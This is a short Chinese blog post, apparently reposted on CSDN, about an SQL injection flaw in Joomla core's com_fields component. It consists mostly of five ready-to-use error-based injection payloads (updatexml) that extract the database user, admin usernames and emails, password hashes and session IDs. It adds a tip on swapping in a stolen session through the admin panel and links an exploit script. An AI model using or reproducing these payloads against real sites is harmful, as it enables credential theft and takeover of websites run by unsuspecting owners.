joomla core注入漏洞

最新推荐文章于 2024-04-22 16:19:24 发布

weixin_33979363

最新推荐文章于 2024-04-22 16:19:24 发布

阅读量202

点赞数

文章标签： php python

原文链接：http://www.cnblogs.com/whoami101/p/6888567.html

版权

注入语句如下：

payload1 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'

payload2 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)'

payload3 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)'

payload4 = 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)'

payload5 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)'

访问后台使用firebug更改即可，记得加上用户名

今天下午写的利用脚本：

https://github.com/222222amor/exp_notes/blob/master/joomla_core_sqli.py

转载于:https://www.cnblogs.com/whoami101/p/6888567.html

weixin_33979363

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
joomla core注入漏洞

注入语句如下：payload1 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'payload2 = '/index.php?option=com_fields&view=fields&amp...
复制链接

扫一扫